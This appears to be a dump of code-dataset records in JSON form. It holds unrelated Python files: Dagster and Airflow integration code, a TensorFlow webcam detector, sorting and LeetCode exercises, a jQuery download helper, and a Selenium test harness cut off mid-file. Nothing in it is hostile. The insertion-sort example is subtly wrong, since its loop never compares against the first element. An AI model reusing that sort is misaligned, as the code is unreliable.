len(j['properties']['instruction_list'][0]) == j['properties']['next_instruction']:\n # j['properties']['state'] = 'done'\n # #j['properties']['instruction_log'].append(self.name)\n print(self.env.now, self.name, ':: treatment end', self.current_job_list)\n\n self.current_job_list = []\n","sub_path":"Equipment/TreatmentFurnace.py","file_name":"TreatmentFurnace.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259255071","text":"#!/bin/python3\r\nimport urllib.parse\r\nimport unittest\r\nimport urllib.request as req\r\n\r\n\r\nclass UrllibTest(unittest.TestCase):\r\n\r\n\t@staticmethod\r\n\tdef test1():\r\n\t\tprint(urllib.parse.quote(\"(\")) # %28\r\n\t\tprint(urllib.parse.quote(\"\\\\\")) # %5C\r\n\r\n\t@staticmethod\r\n\tdef test2():\r\n\t\tprint(urllib.parse.unquote(\"%2F\")) # /\r\n\r\n\t@staticmethod\r\n\tdef test3():\r\n\t\tresp = req.urlopen(\"http://www.baidu.com\")\r\n\t\tres = resp.read()\r\n\t\tprint(type(res)) # \r\n\t\tres_str = str(res, encoding=\"utf-8\")\r\n\t\tprint(type(res_str)) # \r\n\t\tres_str2 = res.decode(encoding=\"utf-8\")\r\n\t\tprint(type(res_str2)) # \r\n\t\tprint(res_str2)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tsuite = unittest.TestSuite()\r\n\tsuite.addTest(UrllibTest('test1'))\r\n\tsuite.addTest(UrllibTest(\"test2\"))\r\n\r\n\tunittest.TextTestRunner(verbosity=2).run(suite)\r\n","sub_path":"urldemo/urllibdemo.py","file_name":"urllibdemo.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"360255891","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Terry n\n\"\"\"\n# Imports\nimport numpy as np\nimport os\nimport sys\nimport tensorflow as tf\nimport cv2\n\n\n\n# if tf.__version__ < '1.4.0':\n# raise ImportError('Please upgrade your tensorflow installation to v1.4.* or later!')\n\nos.chdir('C:\\\\Users\\\\YFZX\\\\Desktop\\\\tensorflow_jupyter\\models-master\\\\research\\\\object_detection')\n\n\n# Env setup\n# This is needed to display the images.\n# %matplotlib inline\n\n# This is needed since the notebook is stored in the object_detection folder.\nsys.path.append(\"..\")\n\n# Object detection imports\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\n# Model preparation\n# What model to download.\n#MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17' # [30,21] best\n# MODEL_NAME = 'ssd_inception_v2_coco_2017_11_17' #[42,24]\n# MODEL_NAME = 'faster_rcnn_inception_v2_coco_2017_11_08' #[58,28]\n# MODEL_NAME = 'faster_rcnn_resnet50_coco_2017_11_08' #[89,30]\n# MODEL_NAME = 'faster_rcnn_resnet50_lowproposals_coco_2017_11_08' #[64, ]\n# MODEL_NAME = 'rfcn_resnet101_coco_2017_11_08' #[106,32]\n# MODEL_NAME = 'faster_rcnn_inception_resnet_v2_atrous_coco_2018_01_28'\n# MODEL_NAME = 'ssdlite_mobilenet_v2_coco_2018_05_09'\nMODEL_NAME = 'linux_frozen_inference_graph'\n\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '/online_frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\n#PATH_TO_LABELS = os.path.join('data', 'mscoco_label_map.pbtxt')\nPATH_TO_LABELS = os.path.join('data', 'linux_face.pbtxt')\n\n#NUM_CLASSES = 90\nNUM_CLASSES = 1\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n # Loading label map\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,\n use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n\n# Helper code\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\n\n# Size, in inches, of the output images.\n# IMAGE_SIZE = (12, 8)\n\n\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n # the video to be detected, eg, \"test.mp4\" here\n vidcap = cv2.VideoCapture(0)\n # Default resolutions of the frame are obtained.The default resolutions are system dependent.\n # We convert the resolutions from float to integer.\n frame_width = int(vidcap.get(3))\n frame_height = int(vidcap.get(4))\n\n\n\n while (True):\n ret, image = vidcap.read()\n\n if ret == True:\n\n # image_np = load_image_into_numpy_array(image)\n image_np = image\n\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n print(scores)\n cv2.imshow(\"capture\",image_np)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n ret = False\n # Break the loop\n else:\n break\nvidcap.release()\n\n","sub_path":"double_eyes/laptop_former_camera.py","file_name":"laptop_former_camera.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"613623858","text":"import os\nimport sqlite3\nfrom functools import update_wrapper\n\nfrom dagster import check\n\nfrom .sql import run_migrations_offline as run_migrations_offline_\nfrom .sql import run_migrations_online as run_migrations_online_\n\n\ndef run_migrations_offline(*args, **kwargs):\n try:\n run_migrations_offline_(*args, **kwargs)\n except sqlite3.DatabaseError as exc:\n # This is to deal with concurrent execution -- if this table already exists thanks to a\n # race with another process, we are fine and can continue.\n if not 'table alembic_version already exists' in str(exc):\n raise\n\n\ndef run_migrations_online(*args, **kwargs):\n try:\n run_migrations_online_(*args, **kwargs)\n except (sqlite3.DatabaseError, sqlite3.OperationalError) as exc:\n # This is to deal with concurrent execution -- if this table already exists thanks to a\n # race with another process, we are fine and can continue.\n if not 'table alembic_version already exists' in str(exc):\n raise\n\n\nupdate_wrapper(run_migrations_offline, run_migrations_offline_)\n\nupdate_wrapper(run_migrations_online, run_migrations_online_)\n\n\ndef create_db_conn_string(base_dir, db_name):\n check.str_param(base_dir, 'base_dir')\n check.str_param(db_name, 'db_name')\n\n path_components = os.path.abspath(base_dir).split(os.sep)\n db_file = '{}.db'.format(db_name)\n return 'sqlite:///{}'.format('/'.join(path_components + [db_file]))\n","sub_path":"python_modules/dagster/dagster/core/storage/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181654352","text":"import subprocess\nimport os\n\ndescription = \"\"\"\nInstalls the latest jQuery version into the static folders at:\n/scripts/libs/jquery/jquery.js\n/scripts/libs/jquery/jquery.min.js\n\nFor more information, visit:\nhttp://jquery.org/\n\"\"\"\n\ndef post_build():\n\n jquery_dir = os.path.join(project_dir, 'static/scripts/libs/jquery')\n if not os.path.exists(jquery_dir):\n os.makedirs(jquery_dir)\n commands = [\n 'cd '+jquery_dir,\n 'touch jquery.js',\n 'touch jquery.min.js',\n 'curl http://code.jquery.com/jquery-latest.js > jquery.js',\n 'curl http://code.jquery.com/jquery-latest.min.js > jquery.min.js',\n ]\n kwargs = dict(\n shell=True\n )\n process = subprocess.Popen('; '.join(commands), **kwargs)\n stdout, stderr = process.communicate()","sub_path":"modules/jquery/chuck_module.py","file_name":"chuck_module.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"536096229","text":"\"\"\" This is an implemetation of the naive approach for sorting the elements of\n of a list. This approach is called Bubble Sort or, sometimes Sinking Sort.\n The name bubble sort comes from the fact that at each iteration the largest\n or lowest number ends up at the position it belongs.\n The time complexity or efficiency is O(n^2).\n\"\"\"\n\ndef bubble_sort(list):\n n = len(list)\n for i in range(0, n - 1):\n for j in range(0, n - 1- i):\n if (list[j] > list[j+1]):\n # swap positions\n list[j], list[j+1] = list[j+1], list[j]\n return list\n\nages = [21, 4, 1, 3, 9, 20, 25, 6, 21, 14]\n\nprint(bubble_sort(ages))","sub_path":"data_structures_and_algorithms/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"345901381","text":"\n\nfrom xai.brain.wordbase.verbs._spot import _SPOT\n\n#calss header\nclass _SPOTS(_SPOT, ):\n\tdef __init__(self,): \n\t\t_SPOT.__init__(self)\n\t\tself.name = \"SPOTS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"spot\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_spots.py","file_name":"_spots.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"569664428","text":"# 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。 \n# \n# 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。 \n# \n# \n# \n# 示例: \n# \n# 给定 nums = [2, 7, 11, 15], target = 9\n# \n# 因为 nums[0] + nums[1] = 2 + 7 = 9\n# 所以返回 [0, 1]\n# \n# Related Topics 数组 哈希表 \n# 👍 9920 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \"\"\"\n\n :rtype: object\n \"\"\"\n hashtable = {}\n for i, num in enumerate(nums):\n if target - num not in hashtable:\n hashtable[num] = i\n continue\n return [hashtable[target - num], i]\n return []\n\n\nex = Solution()\nprint(ex.twoSum([2, 7, 11, 15], 13))\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"[1]两数之和.py","file_name":"[1]两数之和.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"13386519","text":"class InsertionSort:\n\n def __init__(self,A):\n self.A=A;\n self.key=1300\n\n\n def displayArray(self):\n print(self.A)\n\n def sort(self):\n\n for j in range (1, len(self.A)):\n self.key=self.A[j]\n i=j-1\n\n while self.A[i]>self.key and i>0:\n self.A[i+1]=self.A[i]\n i=i-1\n\n self.A[i+1]=self.key\n\n\n\nA=[0,2,4,6,8,7,7,5,9,11]\n\nsort1=InsertionSort(A);\nsort1.sort()\nsort1.displayArray()\n","sub_path":"insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370936547","text":"N, M = map(int, input().split(' '))\nrst_ls = [ '' for i in range(N) ]\nrst = ''\nif M == 0:\n if N == 1:\n print(0)\n else:\n rst = '1' + '0' * (N - 1)\n print(rst)\nelse:\n is_end = False\n for i in range(M):\n ls = list(input().split(' '))\n idx = int(ls[0]) - 1\n if idx == 0 and ls[1] == '0' and N > 1:\n is_end = True\n print(-1)\n break\n elif rst_ls[idx] == '':\n rst_ls[idx] = ls[1]\n elif rst_ls[idx] != ls[1]:\n is_end = True\n print(-1)\n break\n if not is_end:\n if rst_ls[0] == '' and N > 1:\n rst_ls[0] = 1\n for i in rst_ls:\n if i == '':\n i = 0\n print(i, end='')","sub_path":"Python_codes/p02761/s192557707.py","file_name":"s192557707.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537071343","text":"import datetime\nimport logging\nimport sys\nfrom contextlib import contextmanager\n\nimport dateutil\nfrom airflow.models import TaskInstance\nfrom airflow.models.baseoperator import BaseOperator\nfrom airflow.models.dag import DAG\nfrom airflow.models.dagbag import DagBag\nfrom airflow.settings import LOG_FORMAT\n\nfrom dagster import (\n DagsterInvariantViolationError,\n DependencyDefinition,\n InputDefinition,\n MultiDependencyDefinition,\n Nothing,\n OutputDefinition,\n PipelineDefinition,\n RepositoryDefinition,\n SolidDefinition,\n check,\n solid,\n)\nfrom dagster.core.definitions.utils import VALID_NAME_REGEX, validate_tags\nfrom dagster.core.instance import AIRFLOW_EXECUTION_DATE_STR, IS_AIRFLOW_INGEST_PIPELINE_STR\n\n\nclass DagsterAirflowError(Exception):\n pass\n\n\ndef make_dagster_repo_from_airflow_dag_bag(dag_bag, repo_name):\n ''' Construct a Dagster repository corresponding to Airflow DAGs in DagBag.\n\n DagBag.get_dag() dependency requires Airflow DB to be initialized\n\n Usage:\n Create `make_dagster_repo.py`:\n from dagster_airflow.dagster_pipeline_factory import make_dagster_repo_from_airflow_dag_bag\n from airflow_home import my_dag_bag\n\n def make_repo_from_dag_bag():\n return make_dagster_repo_from_airflow_dag_bag(my_dag_bag, 'my_repo_name')\n\n Use RepositoryDefinition as usual, for example:\n `dagit -f path/to/make_dagster_repo.py -n make_repo_from_dag_bag`\n\n Args:\n dag_path (str): Path to directory or file that contains Airflow Dags\n repo_name (str): Name for generated RepositoryDefinition\n\n Returns:\n RepositoryDefinition\n '''\n check.inst_param(dag_bag, 'dag_bag', DagBag)\n check.str_param(repo_name, 'repo_name')\n\n pipeline_defs = []\n for dag_id in dag_bag.dag_ids:\n pipeline_defs.append(make_dagster_pipeline_from_airflow_dag(dag_bag.get_dag(dag_id)))\n\n return RepositoryDefinition(name=repo_name, pipeline_defs=pipeline_defs)\n\n\ndef make_dagster_repo_from_airflow_dags_path(\n dag_path, repo_name, safe_mode=True, store_serialized_dags=False\n):\n ''' Construct a Dagster repository corresponding to Airflow DAGs in dag_path.\n\n DagBag.get_dag() dependency requires Airflow DB to be initialized.\n\n Usage:\n\n Create `make_dagster_repo.py`:\n from dagster_airflow.dagster_pipeline_factory import make_dagster_repo_from_airflow_dags_path\n\n def make_repo_from_dir():\n return make_dagster_repo_from_airflow_dags_path(\n '/path/to/dags/', 'my_repo_name'\n )\n Use RepositoryDefinition as usual, for example:\n `dagit -f path/to/make_dagster_repo.py -n make_repo_from_dir`\n\n Args:\n dag_path (str): Path to directory or file that contains Airflow Dags\n repo_name (str): Name for generated RepositoryDefinition\n safe_mode (bool): True to use Airflow's default heuristic to find files that contain DAGs\n (ie find files that contain both b'DAG' and b'airflow') (default: True)\n store_serialized_dags (bool): True to read Airflow DAGS from Airflow DB. False to read DAGS\n from Python files. (default: False)\n\n Returns:\n RepositoryDefinition\n '''\n check.str_param(dag_path, 'dag_path')\n check.str_param(repo_name, 'repo_name')\n check.bool_param(safe_mode, 'safe_mode')\n check.bool_param(store_serialized_dags, 'store_serialized_dags')\n\n try:\n dag_bag = DagBag(\n dag_folder=dag_path,\n include_examples=False, # Exclude Airflow example DAGs\n safe_mode=safe_mode,\n store_serialized_dags=store_serialized_dags,\n )\n except Exception: # pylint: disable=broad-except\n raise DagsterAirflowError('Error initializing airflow.models.dagbag object with arguments')\n\n return make_dagster_repo_from_airflow_dag_bag(dag_bag, repo_name)\n\n\ndef make_dagster_pipeline_from_airflow_dag(dag, tags=None):\n '''Construct a Dagster pipeline corresponding to a given Airflow DAG.\n\n Tasks in the resulting pipeline will execute the execute() method on the corresponding Airflow\n Operator. Dagster, any dependencies required by Airflow Operators, and the module\n containing your DAG definition must be available in the Python environment within which\n your Dagster solids execute.\n\n To set Airflow's `execution_date` for use with Airflow Operator's execute() methods, either\n (1) (Best for ad hoc runs) Run Pipeline with 'default' preset, which sets execution_date to\n the time (in UTC) of pipeline invocation\n\n ```\n execute_pipeline(\n pipeline=make_dagster_pipeline_from_airflow_dag(dag),\n preset='default')\n ```\n\n (2) Add {'airflow_execution_date': utc_date_string} to the PipelineDefinition tags. This\n will override behavior from (1).\n\n ```\n execute_pipeline(\n make_dagster_pipeline_from_airflow_dag(\n dag,\n {'airflow_execution_date': utc_execution_date_str}\n )\n )\n ```\n\n (3) (Recommended) Add {'airflow_execution_date': utc_date_string} to the PipelineRun tags,\n such as in the Dagit UI. This will override behavior from (1) and (2)\n\n We apply normalized_name() to the dag id and task ids when generating pipeline name and solid\n names to ensure that names conform to Dagster's naming conventions.\n\n Args:\n dag (DAG): The Airflow DAG to compile into a Dagster pipeline\n tags (Dict[str, Field]): Pipeline tags. Optionally include\n `tags={'airflow_execution_date': utc_date_string}` to specify execution_date used within\n execution of Airflow Operators.\n\n Returns:\n pipeline_def (PipelineDefinition): The generated Dagster pipeline\n\n '''\n check.inst_param(dag, 'dag', DAG)\n tags = check.opt_dict_param(tags, 'tags')\n\n if IS_AIRFLOW_INGEST_PIPELINE_STR not in tags:\n tags[IS_AIRFLOW_INGEST_PIPELINE_STR] = 'true'\n\n tags = validate_tags(tags)\n\n pipeline_dependencies, solid_defs = _get_pipeline_definition_args(dag)\n pipeline_def = PipelineDefinition(\n name=normalized_name(dag.dag_id),\n solid_defs=solid_defs,\n dependencies=pipeline_dependencies,\n tags=tags,\n )\n return pipeline_def\n\n\n# Airflow DAG ids and Task ids allow a larger valid character set (alphanumeric characters,\n# dashes, dots and underscores) than Dagster's naming conventions (alphanumeric characters,\n# underscores), so Dagster will strip invalid characters and replace with '_'\ndef normalized_name(name):\n return 'airflow_' + ''.join(c if VALID_NAME_REGEX.match(c) else '_' for c in name)\n\n\ndef _get_pipeline_definition_args(dag):\n check.inst_param(dag, 'dag', DAG)\n pipeline_dependencies = {}\n solid_defs = []\n seen_tasks = []\n\n # To enforce predictable iteration order\n dag_roots = sorted(dag.roots, key=lambda x: x.task_id)\n for task in dag_roots:\n _traverse_airflow_dag(task, seen_tasks, pipeline_dependencies, solid_defs)\n return (pipeline_dependencies, solid_defs)\n\n\ndef _traverse_airflow_dag(task, seen_tasks, pipeline_dependencies, solid_defs):\n check.inst_param(task, 'task', BaseOperator)\n check.list_param(seen_tasks, 'seen_tasks', BaseOperator)\n check.list_param(solid_defs, 'solid_defs', SolidDefinition)\n\n seen_tasks.append(task)\n current_solid = make_dagster_solid_from_airflow_task(task)\n solid_defs.append(current_solid)\n\n if len(task.upstream_list) > 0:\n # To enforce predictable iteration order\n task_upstream_list = sorted(task.upstream_list, key=lambda x: x.task_id)\n\n pipeline_dependencies[current_solid.name] = {\n 'airflow_task_ready': MultiDependencyDefinition(\n [\n DependencyDefinition(\n solid=normalized_name(task_upstream.task_id),\n output='airflow_task_complete',\n )\n for task_upstream in task_upstream_list\n ]\n )\n }\n\n # To enforce predictable iteration order\n task_downstream_list = sorted(task.downstream_list, key=lambda x: x.task_id)\n for child_task in task_downstream_list:\n if child_task not in seen_tasks:\n _traverse_airflow_dag(child_task, seen_tasks, pipeline_dependencies, solid_defs)\n\n\n@contextmanager\ndef replace_airflow_logger_handlers():\n try:\n # Redirect airflow handlers to stdout / compute logs\n prev_airflow_handlers = logging.getLogger('airflow.task').handlers\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(logging.Formatter(LOG_FORMAT))\n root = logging.getLogger('airflow.task')\n root.handlers = [handler]\n yield\n finally:\n # Restore previous log handlers\n logging.getLogger('airflow.task').handlers = prev_airflow_handlers\n\n\ndef make_dagster_solid_from_airflow_task(task):\n check.inst_param(task, 'task', BaseOperator)\n\n @solid(\n name=normalized_name(task.task_id),\n input_defs=[InputDefinition('airflow_task_ready', Nothing)],\n output_defs=[OutputDefinition(Nothing, 'airflow_task_complete')],\n )\n def _solid(context): # pylint: disable=unused-argument\n if AIRFLOW_EXECUTION_DATE_STR not in context.pipeline_run.tags:\n raise DagsterInvariantViolationError(\n 'Could not find \"{AIRFLOW_EXECUTION_DATE_STR}\" in pipeline tags \"{tags}\". Please '\n 'add \"{AIRFLOW_EXECUTION_DATE_STR}\" to pipeline tags before executing'.format(\n AIRFLOW_EXECUTION_DATE_STR=AIRFLOW_EXECUTION_DATE_STR,\n tags=context.pipeline_run.tags,\n )\n )\n execution_date_str = context.pipeline_run.tags.get(AIRFLOW_EXECUTION_DATE_STR)\n\n check.str_param(execution_date_str, 'execution_date_str')\n try:\n execution_date = dateutil.parser.parse(execution_date_str)\n except ValueError:\n raise DagsterInvariantViolationError(\n 'Could not parse execution_date \"{execution_date_str}\". Please use datetime format '\n 'compatible with dateutil.parser.parse.'.format(\n execution_date_str=execution_date_str,\n )\n )\n except OverflowError:\n raise DagsterInvariantViolationError(\n 'Date \"{execution_date_str}\" exceeds the largest valid C integer on the system.'.format(\n execution_date_str=execution_date_str,\n )\n )\n\n check.inst_param(execution_date, 'execution_date', datetime.datetime)\n\n with replace_airflow_logger_handlers():\n task_instance = TaskInstance(task=task, execution_date=execution_date)\n\n ti_context = task_instance.get_template_context()\n task.render_template_fields(ti_context)\n\n task.execute(ti_context)\n return None\n\n return _solid\n","sub_path":"python_modules/libraries/dagster-airflow/dagster_airflow/dagster_pipeline_factory.py","file_name":"dagster_pipeline_factory.py","file_ext":"py","file_size_in_byte":11084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"464340165","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\nfrom selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom ua_parser import user_agent_parser\nfrom HTMLParser import HTMLParser\nfrom TestConfig import TestSettings\nimport unittest, platform, re, json, urllib2, socket, os\nimport time\n\nclass TestResults():\n def __init__(self, environment, app):\n try:\n self.ip = socket.gethostbyname(app[\"URL\"])\n except:\n self.ip = 'unknown'\n try:\n self.server = socket.gethostbyaddr(self.ip)[0]\n except:\n self.server='unknown'\n self.results = {\n \"Time\": str(time.strftime('%Y-%m-%d %H:%M:%S')),\n \"application\": {\n \"item_id\": app[\"ITEM_ID\"],\n \"item_name\": app.get(\"ITEM_NAME\", app[\"ITEM_ID\"]),\n \"ip\": self.ip,\n \"server\": self.server.lower(),\n \"url\": app[\"URL\"]\n },\n \"results\": {\n \"duration\": 0,\n \"tests_count\": len([d for d in app['TESTS'] if int(d.get('enabled',0)) == 1])\n },\n \"tests\": []\n }\n self.results['environment'] = environment\n self.count = 0\n def TestStart(self):\n self.transaction_start = time.time()\n def TestFinish(self):\n self.transaction_end = time.time()\n self.duration = round(self.transaction_end - self.transaction_start, 2)\n self.results['results']['duration'] = round(self.results['results']['duration'] + self.duration, 2)\n def TestResults(self, info):\n self.results['results']['status'] = info['status']\n if 'error' in info: self.results['results']['error'] = info['error']\n info['duration'] = self.duration\n self.results['tests'].append(info)\n def TestSkipped(self):\n info = {'status': 'Skipped'}\n self.results['tests'].append(info)\n def WriteResults(self):\n self.results['results']['tests_run'] = len(self.results['tests'])\n\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n error = s.get_data()\n error = re.sub(r'(?:\\n)+', ' ', error)\n return re.sub(r'\\s+', ' ', error)\n\n\ndef getEnvironmentDetails(driver):\n # GET BROWSER INFO\n ua_string = driver.execute_script(\"return navigator.userAgent\")\n ua = user_agent_parser.Parse(ua_string)\n # GET NODE INFO\n try:\n session = driver.session_id\n url = \"{0}://{1}:{2}/grid/api/testsession?session={3}\".format(TestSettings.get('SeleniumHub', 'protocol'), TestSettings.get('SeleniumHub', 'host'), TestSettings.get('SeleniumHub', 'port'), session)\n req = urllib2.Request(url)\n req.add_header(\"Content-Type\", \"application/json\")\n response = urllib2.urlopen(req)\n node = json.loads(response.read())\n response.close()\n ip = re.search('\\/\\/([^\\:]+)\\:', node.get('proxyId')).group(1)\n try:\n host = socket.gethostbyaddr(ip)[0]\n except:\n host = ip\n except:\n host = \"unknown\"\n ip = \"unknown\"\n environment = {\n 'browser': {\n \"name\": ua['user_agent']['family'],\n \"version\": \"{0}.{1}.{2}\".format(ua['user_agent']['major'], ua['user_agent']['minor'], ua['user_agent']['patch']) if ua['user_agent']['patch'] else \"{0}.{1}\".format(ua['user_agent']['major'], ua['user_agent']['minor'])\n },\n 'host': {\n 'name': host,\n 'ip': ip,\n 'os': \"{0} {1}.{2}\".format(ua['os']['family'], ua['os']['major'], ua['os']['minor']) if ua['os']['minor'] else \"{0} {1}\".format(ua['os']['family'], ua['os']['major'])\n }\n }\n return environment\n\n\ndef getScreenshot(browser):\n try:\n img_str = browser.get_screenshot_as_base64()\n except:\n img_str = \"Screenshot capture failed\"\n return img_str\n\n\ndef TestGenerator(app, screenshot_always=False):\n def applicationTest(self):\n \n if self.browsers.get(app.get('BROWSER')) == None:\n self.browsers[app['BROWSER']] = launchBrowser(app['BROWSER'])\n self.browser_details[app['BROWSER']] = getEnvironmentDetails(self.browsers[app['BROWSER']])\n \n self.driver = self.browsers[app['BROWSER']]\n\n self.test = TestResults(self.browser_details[app['BROWSER']], app)\n\n testCommands = {\n 'Open': self.go_to_url,\n 'Verify title': self.check_title,\n 'Find': self.find_element,\n 'Click': self.click_element,\n 'Type': self.enter_text,\n 'Health': self.health_check,\n 'Switch to': self.switch_to,\n 'Wait': self.wait_for_it,\n 'Get attribute': self.get_current_element_attribute\n }\n\n for step in app[\"TESTS\"]:\n if int(step.get('enabled',0)) == 1:\n try:\n # Clear performance logs before each new test\n if app['BROWSER'] in [\"Chrome\",\"ChromeIncognito\"] and step[\"command\"] in [\"Open\", \"Click\"]:\n while len(self.driver.get_log('performance')) > 0:\n pass\n # Launch appropriate command from the testCommands library\n self.assertEquals(testCommands[step[\"command\"]](**step), True)\n except:\n break\n else:\n self.test.TestSkipped()\n \n if screenshot_always or self.test.results['results']['status'] == \"Failed\":\n if screenshot_always:\n self.test.results['screenshot'] = getScreenshot(self.driver)\n else:\n self.test.results['results']['screenshot'] = getScreenshot(self.driver)\n if app['BROWSER'] in [\"Chrome\",\"ChromeIncognito\"]:\n logs = self.driver.get_log('performance')\n self.test.results['results']['logs'] = [json.loads(log['message'])['message'] for log in logs if json.loads(log['message'])['message']['method'].startswith('Network')]\n\n self.test.WriteResults()\n return applicationTest\n\ndef launchBrowser(browser):\n # Get Selenium Hub and Browser settings from settings.conf\n hub = \"{0}://{1}:{2}/wd/hub\".format(TestSettings.get('SeleniumHub', 'protocol'), TestSettings.get('SeleniumHub', 'host'), TestSettings.get('SeleniumHub', 'port'))\n sitelist = TestSettings.get(\"BrowserSettings\", \"sitelist\")\n\n if browser in [\"Chrome\",\"ChromeIncognito\"]:\n # START CHROME BROWSER\n options = webdriver.ChromeOptions()\n \n options.add_argument(\"auth-server-whitelist={0}\".format(sitelist))\n options.add_argument(\"auth-negotiate-delegatewhitelist={0}\".format(sitelist))\n options.add_argument(\"auth-schemes=digest,ntlm,negotiate\")\n options.add_argument(\"--disable-http2\")\n if browser == \"ChromeIncognito\":\n options.add_argument(\"--incognito\")\n \n capabilities = options.to_capabilities()\n capabilities['goog:loggingPrefs'] = { 'performance':'ALL' }\n \n driver = webdriver.Remote(hub, capabilities)\n driver.maximize_window()\n driver.set_page_load_timeout(30)\n else:\n # START FIREFOX BROWSER\n # CREATE PROFILE\n profile = FirefoxProfile()\n # ENABLE KERBEROS\n profile.set_preference(\"network.negotiate-auth.trusted-uris\", sitelist)\n profile.set_preference(\"network.negotiate-auth.delegation-uris\", sitelist)\n profile.set_preference(\"network.automatic-ntlm-auth.trusted-uris\", sitelist)\n # DISABLE CACHE\n profile.set_preference(\"browser.cache.disk.enable\", False)\n profile.set_preference(\"browser.cache.memory.enable\", False)\n profile.set_preference(\"browser.cache.offline.enable\", False)\n profile.set_preference(\"network.http.use-cache\", False)\n # DISABLE FLASH\n profile.set_preference(\"plugin.state.flash\", 0)\n # PREVENTS FAILING ON SELF-SIGNED CERTIFICATES\n capabilities = DesiredCapabilities.FIREFOX.copy()\n\n driver = webdriver.Remote(hub, capabilities, browser_profile=profile)\n driver.maximize_window()\n driver.set_page_load_timeout(30)\n\n return driver\n\nclass TestSuite(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n self.browsers = {}\n self.browser_details = {}\n\n @classmethod\n def tearDownClass(self):\n time.sleep(3)\n for browser, driver in self.browsers.iteritems():\n driver.quit()\n\n def check_title(self, **info):\n info[\"description\"] = \"{0} 